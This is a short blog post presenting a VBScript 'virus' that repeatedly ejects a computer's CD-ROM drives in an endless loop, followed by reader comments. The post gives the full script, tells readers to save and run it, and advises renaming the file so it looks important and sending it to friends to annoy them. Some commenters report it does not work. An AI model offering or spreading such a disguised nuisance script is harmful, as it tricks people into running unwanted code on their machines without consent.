A Self-Made Virus That Will Open And Close Your Cdrom


Well,its a virus and a prank! you can even modify it.


Code:
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


How to:-

copy this into notepad and save it as anyname.vbs like virus.vbs
and then double click on it...what u see....bingo

Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process.

Rename it,so that it looks something important and then send it to all your friends to annoy them.

Ps:
How To Stop : Virus That Will Open And Close Your Cdrom
When somebody opens the 'virus' the CD/DVDROMs of it's computer
will open and close until you go crazy because it can be stopped by closing the CD/DVDROMs.

4. The only way to stop this is to press CTRL+ALT+DEL and stop the process wscript.exe.

8 Responses to "A Self-Made Virus That Will Open And Close Your Cdrom"

  1. gravatar Rizwan Ibrahim

    Nice post !! =)

  2. hey unable to compile vbscriop showing error line 11

  3. good work dude.........
    .
    .
    .
    keep it up.......

  4. gravatar Anonymous

    not working what the F

Leave a Reply